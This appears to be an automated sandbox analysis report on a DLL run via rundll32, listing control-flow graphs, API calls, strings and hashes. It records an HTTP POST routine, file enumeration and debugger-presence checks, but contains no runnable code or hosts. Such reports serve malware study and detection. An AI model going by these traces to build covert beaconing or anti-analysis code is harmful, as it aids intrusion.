                                                                • Snapshot File: hcaresult_12_2_6c050000_rundll32.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: $NKx$+++$NKx$NKxo$abcdefghijklmnopqrstuvwxyz0123456789$wlt=1
                                                                • API String ID: 0-627200555
                                                                • Opcode ID: 86470fe5233d6829d1f42bec856c0fb489e7ea6203af2649c727a4ea00ae3673
                                                                • Instruction ID: 5918cc9c34f4a6db0f56ea423f9d0e20f41f18a49038f98909d497d0d9799260
                                                                • Opcode Fuzzy Hash: 86470fe5233d6829d1f42bec856c0fb489e7ea6203af2649c727a4ea00ae3673
                                                                • Instruction Fuzzy Hash: D4F109B1A00208AFEB04CF69CD44BAEBBF5FB49714F90461DF414A7BC0DB75A9548B91

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 0 6c051ec0-6c051f1c call 6c056751 4 6c051f22-6c051f26 0->4 5 6c05242e-6c052459 call 6c055d90 0->5 4->5 7 6c051f2c-6c051f30 4->7 10 6c052483-6c05249b 5->10 11 6c05245b-6c052467 5->11 7->5 9 6c051f36-6c052053 call 6c055d90 InternetOpenW InternetConnectA HttpOpenRequestA HttpSendRequestA InternetReadFile 7->9 20 6c05225f-6c0522c8 InternetCloseHandle * 3 9->20 21 6c052059 9->21 16 6c0523e5-6c0523fd 10->16 17 6c0524a1-6c0524ad 10->17 13 6c052479-6c052480 call 6c05679f 11->13 14 6c052469-6c052477 11->14 13->10 14->13 18 6c0524ef call 6c0599dc 14->18 24 6c052403-6c05240f 16->24 25 6c0524d2-6c0524ee call 6c056791 16->25 22 6c0524b3-6c0524c1 17->22 23 6c0523db-6c0523e2 call 6c05679f 17->23 37 6c0524f4-6c0524f9 call 6c056c3c 18->37 28 6c0522ff-6c05231d 20->28 29 6c0522ca-6c0522d9 20->29 31 6c052060-6c052067 21->31 22->18 33 6c0524c3 22->33 23->16 34 6c052415-6c052423 24->34 35 6c0524c8-6c0524cf call 6c05679f 24->35 42 6c052350-6c052371 28->42 43 6c05231f-6c052330 28->43 38 6c0522ef-6c0522fc call 6c05679f 29->38 39 6c0522db-6c0522e9 29->39 40 6c05206d-6c05209b 31->40 41 6c052259 31->41 33->23 34->18 46 6c052429 34->46 35->25 38->28 39->18 39->38 51 6c0520a0-6c0520a5 40->51 41->20 47 6c052373-6c05237f 42->47 48 6c05239f-6c0523b7 42->48 52 6c052346-6c05234d call 6c05679f 43->52 53 6c052332-6c052340 43->53 46->35 55 6c052395-6c05239c call 6c05679f 47->55 56 6c052381-6c05238f 47->56 48->16 58 6c0523b9-6c0523c5 48->58 51->51 60 6c0520a7-6c05214b call 6c055d90 * 2 51->60 52->42 53->18 53->52 55->48 56->18 56->55 58->23 63 6c0523c7-6c0523d5 58->63 70 6c052181-6c05219a call 6c056390 60->70 71 6c05214d-6c05217f call 6c059260 60->71 63->18 63->23 76 6c0521a0-6c0521ad 70->76 71->76 77 6c0521af-6c0521ba 76->77 78 6c0521da-6c0521e7 76->78 79 6c0521d0-6c0521d7 call 6c05679f 77->79 80 6c0521bc-6c0521ca 77->80 81 6c0521e9-6c0521f8 78->81 82 6c052218-6c052223 78->82 79->78 80->18 80->79 85 6c05220e-6c052215 call 6c05679f 81->85 86 6c0521fa-6c052208 81->86 82->37 83 6c052229-6c052253 InternetReadFile 82->83 83->31 83->41 85->82 86->18 86->85
                                                                APIs
                                                                • std::_Xinvalid_argument.LIBCPMT ref: 6C051EC5
                                                                  • Part of subcall function 6C056751: std::invalid_argument::invalid_argument.LIBCONCRT ref: 6C05675D
                                                                • InternetOpenW.WININET(6C06BA54,00000000,00000000,00000000,00000000), ref: 6C051FA7
                                                                • InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 6C051FCE
                                                                • HttpOpenRequestA.WININET(00000000,POST,?,00000000,00000000,00000000,00000000,00000001), ref: 6C051FF8
                                                                • HttpSendRequestA.WININET(00000000,00000000,00000000,?,00000000), ref: 6C052031
                                                                • InternetReadFile.WININET(00000000,?,000003FF,?), ref: 6C05204B
                                                                • InternetReadFile.WININET(?,00000000,000003FF,00000000), ref: 6C05224B
                                                                • InternetCloseHandle.WININET(00000000), ref: 6C052266
                                                                • InternetCloseHandle.WININET(?), ref: 6C05226E
                                                                • InternetCloseHandle.WININET(?), ref: 6C052276
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2924991559.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                • Associated: 0000000C.00000002.2924945917.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                • Associated: 0000000C.00000002.2925057270.000000006C066000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                • Associated: 0000000C.00000002.2925098569.000000006C06E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                • Associated: 0000000C.00000002.2925131103.000000006C070000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_6c050000_rundll32.jbxd
                                                                Similarity
                                                                • API ID: Internet$CloseHandle$FileHttpOpenReadRequest$ConnectSendXinvalid_argumentstd::_std::invalid_argument::invalid_argument
                                                                • String ID: Content-Type: application/x-www-form-urlencoded$NKx$NKx$NKx]$NKxo$POST$string too long
                                                                • API String ID: 4066372336-2944832111
                                                                • Opcode ID: de376a9af6c3a9a3193f136fd46471f98228fb2d0cd3e27c86ae497cf7f0f9d4
                                                                • Instruction ID: 0c5ba7903e2523954a71d7060e3ae2962fcfb011e3d64bad6450a38456b4dfe7
                                                                • Opcode Fuzzy Hash: de376a9af6c3a9a3193f136fd46471f98228fb2d0cd3e27c86ae497cf7f0f9d4
                                                                • Instruction Fuzzy Hash: F2F1A2B06011189FEB24CF28CD88BDDBBF5AF45308F9441D8E608AB681DB75AAD4CF55

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 216 6c051ed0-6c051f1c 217 6c051f22-6c051f26 216->217 218 6c05242e-6c052459 call 6c055d90 216->218 217->218 220 6c051f2c-6c051f30 217->220 223 6c052483-6c05249b 218->223 224 6c05245b-6c052467 218->224 220->218 222 6c051f36-6c052053 call 6c055d90 InternetOpenW InternetConnectA HttpOpenRequestA HttpSendRequestA InternetReadFile 220->222 233 6c05225f-6c0522c8 InternetCloseHandle * 3 222->233 234 6c052059 222->234 229 6c0523e5-6c0523fd 223->229 230 6c0524a1-6c0524ad 223->230 226 6c052479-6c052480 call 6c05679f 224->226 227 6c052469-6c052477 224->227 226->223 227->226 231 6c0524ef call 6c0599dc 227->231 237 6c052403-6c05240f 229->237 238 6c0524d2-6c0524ee call 6c056791 229->238 235 6c0524b3-6c0524c1 230->235 236 6c0523db-6c0523e2 call 6c05679f 230->236 250 6c0524f4-6c0524f9 call 6c056c3c 231->250 241 6c0522ff-6c05231d 233->241 242 6c0522ca-6c0522d9 233->242 244 6c052060-6c052067 234->244 235->231 246 6c0524c3 235->246 236->229 247 6c052415-6c052423 237->247 248 6c0524c8-6c0524cf call 6c05679f 237->248 255 6c052350-6c052371 241->255 256 6c05231f-6c052330 241->256 251 6c0522ef-6c0522fc call 6c05679f 242->251 252 6c0522db-6c0522e9 242->252 253 6c05206d-6c05209b 244->253 254 6c052259 244->254 246->236 247->231 259 6c052429 247->259 248->238 251->241 252->231 252->251 264 6c0520a0-6c0520a5 253->264 254->233 260 6c052373-6c05237f 255->260 261 6c05239f-6c0523b7 255->261 265 6c052346-6c05234d call 6c05679f 256->265 266 6c052332-6c052340 256->266 259->248 268 6c052395-6c05239c call 6c05679f 260->268 269 6c052381-6c05238f 260->269 261->229 271 6c0523b9-6c0523c5 261->271 264->264 273 6c0520a7-6c05214b call 6c055d90 * 2 264->273 265->255 266->231 266->265 268->261 269->231 269->268 271->236 276 6c0523c7-6c0523d5 271->276 283 6c052181-6c05219a call 6c056390 273->283 284 6c05214d-6c05217f call 6c059260 273->284 276->231 276->236 289 6c0521a0-6c0521ad 283->289 284->289 290 6c0521af-6c0521ba 289->290 291 6c0521da-6c0521e7 289->291 292 6c0521d0-6c0521d7 call 6c05679f 290->292 293 6c0521bc-6c0521ca 290->293 294 6c0521e9-6c0521f8 291->294 295 6c052218-6c052223 291->295 292->291 293->231 293->292 298 6c05220e-6c052215 call 6c05679f 294->298 299 6c0521fa-6c052208 294->299 295->250 296 6c052229-6c052253 InternetReadFile 295->296 296->244 296->254 298->295 299->231 299->298
                                                                APIs
                                                                • InternetOpenW.WININET(6C06BA54,00000000,00000000,00000000,00000000), ref: 6C051FA7
                                                                • InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 6C051FCE
                                                                • HttpOpenRequestA.WININET(00000000,POST,?,00000000,00000000,00000000,00000000,00000001), ref: 6C051FF8
                                                                • HttpSendRequestA.WININET(00000000,00000000,00000000,?,00000000), ref: 6C052031
                                                                • InternetReadFile.WININET(00000000,?,000003FF,?), ref: 6C05204B
                                                                • InternetReadFile.WININET(?,00000000,000003FF,00000000), ref: 6C05224B
                                                                • InternetCloseHandle.WININET(00000000), ref: 6C052266
                                                                • InternetCloseHandle.WININET(?), ref: 6C05226E
                                                                • InternetCloseHandle.WININET(?), ref: 6C052276
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2924991559.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                • Associated: 0000000C.00000002.2924945917.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                • Associated: 0000000C.00000002.2925057270.000000006C066000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                • Associated: 0000000C.00000002.2925098569.000000006C06E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                • Associated: 0000000C.00000002.2925131103.000000006C070000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_6c050000_rundll32.jbxd
                                                                Similarity
                                                                • API ID: Internet$CloseHandle$FileHttpOpenReadRequest$ConnectSend
                                                                • String ID: Content-Type: application/x-www-form-urlencoded$NKx$NKxo$POST
                                                                • API String ID: 1354133546-2469140843
                                                                • Opcode ID: 7b02f5193ea09553609f47ce51360eab0e559fe0a803e1ecd5b1a1ce988de2ac
                                                                • Instruction ID: 9504de824c45ea58b172f0bb91a96e0ec10b04818853f6e3e846457ae4a715a3
                                                                • Opcode Fuzzy Hash: 7b02f5193ea09553609f47ce51360eab0e559fe0a803e1ecd5b1a1ce988de2ac
                                                                • Instruction Fuzzy Hash: B9F1A2B0A011189FEB24CF28CD88BDDBBF5AF45304F944198E608AB6C1DB75AAD4CF55

                                                                Control-flow Graph

                                                                APIs
                                                                • __RTC_Initialize.LIBCMT ref: 6C056EC1
                                                                • ___scrt_uninitialize_crt.LIBCMT ref: 6C056EDB
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2924991559.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                • Associated: 0000000C.00000002.2924945917.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                • Associated: 0000000C.00000002.2925057270.000000006C066000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                • Associated: 0000000C.00000002.2925098569.000000006C06E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                • Associated: 0000000C.00000002.2925131103.000000006C070000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_6c050000_rundll32.jbxd
                                                                Similarity
                                                                • API ID: Initialize___scrt_uninitialize_crt
                                                                • String ID:
                                                                • API String ID: 2442719207-0
                                                                • Opcode ID: 23f669a8a076896e9ac47b9d01d916c440212625bfc03f404a838a0c3274df04
                                                                • Instruction ID: 1886597aac1611364e8a0190cdfb4fa32acb61af859ce2e58dc6e6c5e0b067dd
                                                                • Opcode Fuzzy Hash: 23f669a8a076896e9ac47b9d01d916c440212625bfc03f404a838a0c3274df04
                                                                • Instruction Fuzzy Hash: 83410B72E15228EFDF208F59CE40BAE7AF5EF40759F908515E814A7B40CB315D25DB90

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 353 6c056f2c-6c056f3d call 6c0573b0 356 6c056f3f-6c056f45 353->356 357 6c056f4e-6c056f55 353->357 356->357 358 6c056f47-6c056f49 356->358 359 6c056f57-6c056f5a 357->359 360 6c056f61-6c056f75 dllmain_raw 357->360 361 6c057027-6c057036 358->361 359->360 362 6c056f5c-6c056f5f 359->362 363 6c05701e-6c057025 360->363 364 6c056f7b-6c056f8c dllmain_crt_dispatch 360->364 365 6c056f92-6c056fa4 call 6c056640 362->365 363->361 364->363 364->365 368 6c056fa6-6c056fa8 365->368 369 6c056fcd-6c056fcf 365->369 368->369 372 6c056faa-6c056fc8 call 6c056640 call 6c056e7a dllmain_raw 368->372 370 6c056fd6-6c056fe7 dllmain_crt_dispatch 369->370 371 6c056fd1-6c056fd4 369->371 370->363 373 6c056fe9-6c05701b dllmain_raw 370->373 371->363 371->370 372->369 373->363
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2924991559.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                • Associated: 0000000C.00000002.2924945917.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                • Associated: 0000000C.00000002.2925057270.000000006C066000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                • Associated: 0000000C.00000002.2925098569.000000006C06E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                • Associated: 0000000C.00000002.2925131103.000000006C070000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_6c050000_rundll32.jbxd
                                                                Similarity
                                                                • API ID: dllmain_raw$dllmain_crt_dispatch
                                                                • String ID:
                                                                • API String ID: 3136044242-0
                                                                • Opcode ID: 9f0005ce9d7f75d20c26c20e31a01fb16435976599f5c61cefed700a559a445b
                                                                • Instruction ID: edc391d79f25a17322e283844189de16f9b9a495dbdd6665fe18df782d6396a2
                                                                • Opcode Fuzzy Hash: 9f0005ce9d7f75d20c26c20e31a01fb16435976599f5c61cefed700a559a445b
                                                                • Instruction Fuzzy Hash: B4219171D11228EFDB218F19CE40BAF3AF9EB84798B918515F81497B10C7319D61EBE0

                                                                Control-flow Graph

                                                                APIs
                                                                • GetLastError.KERNEL32(?,?,00000001,6C05B68B,6C05B935,?,?,6C05AB0E), ref: 6C05B428
                                                                • _free.LIBCMT ref: 6C05B485
                                                                • _free.LIBCMT ref: 6C05B4BB
                                                                • SetLastError.KERNEL32(00000000,00000006,000000FF,?,00000001,6C05B68B,6C05B935,?,?,6C05AB0E), ref: 6C05B4C6
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2924991559.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                • Associated: 0000000C.00000002.2924945917.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                • Associated: 0000000C.00000002.2925057270.000000006C066000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                • Associated: 0000000C.00000002.2925098569.000000006C06E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                • Associated: 0000000C.00000002.2925131103.000000006C070000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_6c050000_rundll32.jbxd
                                                                Similarity
                                                                • API ID: ErrorLast_free
                                                                • String ID:
                                                                • API String ID: 2283115069-0
                                                                • Opcode ID: d7a397feaf920a2d9584f3745466e5ecc2f2b5e8b94d4f33879696bc60bc583b
                                                                • Instruction ID: e18a1c11a01441f8256de8346037dce3f0ac9081738f711ac72c8adcdbe4a5eb
                                                                • Opcode Fuzzy Hash: d7a397feaf920a2d9584f3745466e5ecc2f2b5e8b94d4f33879696bc60bc583b
                                                                • Instruction Fuzzy Hash: 7C11E971705704ABEA201E7A4F84F6B25E9ABC277CBA40625F634D3AC1EF31BC354561

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 412 6c05b8b2-6c05b8bd 413 6c05b8bf-6c05b8c9 412->413 414 6c05b8cb-6c05b8d1 412->414 413->414 415 6c05b8ff-6c05b90a call 6c05b686 413->415 416 6c05b8d3-6c05b8d4 414->416 417 6c05b8ea-6c05b8fb RtlAllocateHeap 414->417 423 6c05b90c-6c05b90e 415->423 416->417 418 6c05b8d6-6c05b8dd call 6c05e4b3 417->418 419 6c05b8fd 417->419 418->415 425 6c05b8df-6c05b8e8 call 6c059eaa 418->425 419->423 425->415 425->417
                                                                APIs
                                                                • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,6C05B46E,00000001,00000364,00000006,000000FF,?,00000001,6C05B68B,6C05B935,?,?,6C05AB0E), ref: 6C05B8F3
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2924991559.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                • Associated: 0000000C.00000002.2924945917.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                • Associated: 0000000C.00000002.2925057270.000000006C066000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                • Associated: 0000000C.00000002.2925098569.000000006C06E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                • Associated: 0000000C.00000002.2925131103.000000006C070000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_6c050000_rundll32.jbxd
                                                                Similarity
                                                                • API ID: AllocateHeap
                                                                • String ID:
                                                                • API String ID: 1279760036-0
                                                                • Opcode ID: 83048dc6929446bc17db5c579a27d8166bf9fd4762d1efc2ff38990517ec95fb
                                                                • Instruction ID: e835dc37168b87a9e30379b721ee82f9823aa3f06dee116fdcfa3604007cccac
                                                                • Opcode Fuzzy Hash: 83048dc6929446bc17db5c579a27d8166bf9fd4762d1efc2ff38990517ec95fb
                                                                • Instruction Fuzzy Hash: 61F0B431206A2867EB115E678F04B7B37DCAF427A4B955161E8149B980CF30F420C6E0

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 710 6c05bd9f-6c05bdc7 711 6c05bdec-6c05bdf6 710->711 712 6c05bdc9-6c05bdcd 710->712 713 6c05be18-6c05be1c 711->713 714 6c05bdf8-6c05bdfd 711->714 715 6c05bde6 712->715 716 6c05bdcf-6c05bdd1 712->716 719 6c05be1e-6c05be20 713->719 720 6c05be28 713->720 717 6c05be12 714->717 718 6c05bdff-6c05be0d call 6c05bcee 714->718 715->711 716->715 721 6c05bdd3-6c05bdd5 716->721 717->713 729 6c05bfe8-6c05bff5 call 6c056791 718->729 719->720 723 6c05be22-6c05be26 719->723 724 6c05be2a-6c05be9a call 6c05bff6 call 6c05bae2 FindFirstFileExW 720->724 721->715 725 6c05bdd7-6c05bde4 call 6c05eab0 721->725 723->720 723->724 736 6c05beb4-6c05bec2 724->736 737 6c05be9c-6c05beaf call 6c05bcee 724->737 725->712 725->715 739 6c05bec8-6c05bf1e call 6c05bff6 call 6c05ba13 736->739 742 6c05bfd0-6c05bfd8 737->742 750 6c05bf31-6c05bf4f call 6c05bcee 739->750 751 6c05bf20-6c05bf25 739->751 744 6c05bfe6 742->744 745 6c05bfda-6c05bfe5 call 6c05b90f 742->745 744->729 745->744 753 6c05bf51-6c05bf57 750->753 759 6c05bfad-6c05bfb3 750->759 752 6c05bf27-6c05bf2a 751->752 751->753 752->750 758 6c05bf2c-6c05bf2f 752->758 756 6c05bf65-6c05bf75 FindNextFileW 753->756 757 6c05bf59-6c05bf64 call 6c05b90f 753->757 756->739 761 6c05bf7b-6c05bf93 756->761 757->756 758->750 758->753 765 6c05bfb5-6c05bfc6 call 6c05b90f 759->765 766 6c05bfc7 759->766 763 6c05bf95-6c05bfab call 6c05e4c0 761->763 764 6c05bfc9-6c05bfca FindClose 761->764 763->764 764->742 765->766 766->764
                                                                APIs
                                                                • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000), ref: 6C05BE8F
                                                                • _free.LIBCMT ref: 6C05BF5F
                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 6C05BF6D
                                                                • _free.LIBCMT ref: 6C05BFBB
                                                                • FindClose.KERNEL32(00000000), ref: 6C05BFCA
                                                                • _free.LIBCMT ref: 6C05BFE0
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2924991559.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                • Associated: 0000000C.00000002.2924945917.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                • Associated: 0000000C.00000002.2925057270.000000006C066000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                • Associated: 0000000C.00000002.2925098569.000000006C06E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                • Associated: 0000000C.00000002.2925131103.000000006C070000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_6c050000_rundll32.jbxd
                                                                Similarity
                                                                • API ID: Find_free$File$CloseFirstNext
                                                                • String ID: NKxo
                                                                • API String ID: 1576393127-1440849049
                                                                • Opcode ID: f2c12f49fb29a569ff18aca5e70d8c75ca036acde406f752c81c356fd297c989
                                                                • Instruction ID: d852a7a395c074553ea8fcb5b7170f86b2e13ac5f977f9aeb91de6c559d4cee7
                                                                • Opcode Fuzzy Hash: f2c12f49fb29a569ff18aca5e70d8c75ca036acde406f752c81c356fd297c989
                                                                • Instruction Fuzzy Hash: 7E61D57190912C9FDF209F288D88BFABBF8AF05308FA441D9D05C97640EB31AE948F10
                                                                APIs
                                                                • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 6C059918
                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 6C059922
                                                                • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 6C05992F
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2924991559.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                • Associated: 0000000C.00000002.2924945917.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                • Associated: 0000000C.00000002.2925057270.000000006C066000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                • Associated: 0000000C.00000002.2925098569.000000006C06E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                • Associated: 0000000C.00000002.2925131103.000000006C070000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_6c050000_rundll32.jbxd
                                                                Similarity
                                                                • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                • String ID: NKxo
                                                                • API String ID: 3906539128-1440849049
                                                                • Opcode ID: 671e7f98fa6128f94c012caa7c788f6e4dd5a5b2814a13e62f73c9d1b9eb97bb
                                                                • Instruction ID: c4610e15d5ce614bcad3cec24a9087cc245aadc3c2ba01fe46b6b5d64678c5b3
                                                                • Opcode Fuzzy Hash: 671e7f98fa6128f94c012caa7c788f6e4dd5a5b2814a13e62f73c9d1b9eb97bb
                                                                • Instruction Fuzzy Hash: 1B31E5B4901218ABCF21DF29C9887DDBBF8BF08314F5041EAE41CA7250EB749B958F44
                                                                APIs
                                                                • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 6C057294
                                                                • IsDebuggerPresent.KERNEL32 ref: 6C057360
                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6C057380
                                                                • UnhandledExceptionFilter.KERNEL32(?), ref: 6C05738A
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2924991559.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                • Associated: 0000000C.00000002.2924945917.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                • Associated: 0000000C.00000002.2925057270.000000006C066000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                • Associated: 0000000C.00000002.2925098569.000000006C06E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                • Associated: 0000000C.00000002.2925131103.000000006C070000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_6c050000_rundll32.jbxd
                                                                Similarity
                                                                • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                • String ID:
                                                                • API String ID: 254469556-0
                                                                • Opcode ID: 634b7658188c79883c6485a2dd32c89dcd26e5cbfef29946141a9a94530afee1
                                                                • Instruction ID: 439036fd75603c5463d0526979f9faac43fb9b0f9354ce6a76fde8403766c2dd
                                                                • Opcode Fuzzy Hash: 634b7658188c79883c6485a2dd32c89dcd26e5cbfef29946141a9a94530afee1
                                                                • Instruction Fuzzy Hash: 223129B5D15218DBDF10DFA5CA897CDBBF8AF08304F5041EAE54DAB240EB745A889F44

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 434 6c05ddf0-6c05de04 435 6c05de06-6c05de0b 434->435 436 6c05de72-6c05de7a 434->436 435->436 437 6c05de0d-6c05de12 435->437 438 6c05dec1-6c05ded9 call 6c05df61 436->438 439 6c05de7c-6c05de7f 436->439 437->436 440 6c05de14-6c05de17 437->440 448 6c05dedc-6c05dee3 438->448 439->438 442 6c05de81-6c05debe call 6c05b90f * 4 439->442 440->436 443 6c05de19-6c05de21 440->443 442->438 446 6c05de23-6c05de26 443->446 447 6c05de3b-6c05de43 443->447 446->447 450 6c05de28-6c05de3a call 6c05b90f call 6c05e230 446->450 453 6c05de45-6c05de48 447->453 454 6c05de5d-6c05de71 call 6c05b90f * 2 447->454 451 6c05dee5-6c05dee9 448->451 452 6c05df02-6c05df06 448->452 450->447 460 6c05deff 451->460 461 6c05deeb-6c05deee 451->461 456 6c05df1e-6c05df2a 452->456 457 6c05df08-6c05df0d 452->457 453->454 462 6c05de4a-6c05de5c call 6c05b90f call 6c05e32e 453->462 454->436 456->448 469 6c05df2c-6c05df37 call 6c05b90f 456->469 466 6c05df0f-6c05df12 457->466 467 6c05df1b 457->467 460->452 461->460 471 6c05def0-6c05defe call 6c05b90f * 2 461->471 462->454 466->467 474 6c05df14-6c05df1a call 6c05b90f 466->474 467->456 471->460 474->467
                                                                APIs
                                                                • ___free_lconv_mon.LIBCMT ref: 6C05DE34
                                                                  • Part of subcall function 6C05E230: _free.LIBCMT ref: 6C05E24D
                                                                  • Part of subcall function 6C05E230: _free.LIBCMT ref: 6C05E25F
                                                                  • Part of subcall function 6C05E230: _free.LIBCMT ref: 6C05E271
                                                                  • Part of subcall function 6C05E230: _free.LIBCMT ref: 6C05E283
                                                                  • Part of subcall function 6C05E230: _free.LIBCMT ref: 6C05E295
                                                                  • Part of subcall function 6C05E230: _free.LIBCMT ref: 6C05E2A7
                                                                  • Part of subcall function 6C05E230: _free.LIBCMT ref: 6C05E2B9
                                                                  • Part of subcall function 6C05E230: _free.LIBCMT ref: 6C05E2CB
                                                                  • Part of subcall function 6C05E230: _free.LIBCMT ref: 6C05E2DD
                                                                  • Part of subcall function 6C05E230: _free.LIBCMT ref: 6C05E2EF
                                                                  • Part of subcall function 6C05E230: _free.LIBCMT ref: 6C05E301
                                                                  • Part of subcall function 6C05E230: _free.LIBCMT ref: 6C05E313
                                                                  • Part of subcall function 6C05E230: _free.LIBCMT ref: 6C05E325
                                                                • _free.LIBCMT ref: 6C05DE29
                                                                  • Part of subcall function 6C05B90F: HeapFree.KERNEL32(00000000,00000000,?,6C05AB0E), ref: 6C05B925
                                                                  • Part of subcall function 6C05B90F: GetLastError.KERNEL32(?,?,6C05AB0E), ref: 6C05B937
                                                                • _free.LIBCMT ref: 6C05DE4B
                                                                • _free.LIBCMT ref: 6C05DE60
                                                                • _free.LIBCMT ref: 6C05DE6B
                                                                • _free.LIBCMT ref: 6C05DE8D
                                                                • _free.LIBCMT ref: 6C05DEA0
                                                                • _free.LIBCMT ref: 6C05DEAE
                                                                • _free.LIBCMT ref: 6C05DEB9
                                                                • _free.LIBCMT ref: 6C05DEF1
                                                                • _free.LIBCMT ref: 6C05DEF8
                                                                • _free.LIBCMT ref: 6C05DF15
                                                                • _free.LIBCMT ref: 6C05DF2D
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2924991559.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                • Associated: 0000000C.00000002.2924945917.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                • Associated: 0000000C.00000002.2925057270.000000006C066000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                • Associated: 0000000C.00000002.2925098569.000000006C06E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                • Associated: 0000000C.00000002.2925131103.000000006C070000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_6c050000_rundll32.jbxd
                                                                Similarity
                                                                • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                • String ID:
                                                                • API String ID: 161543041-0
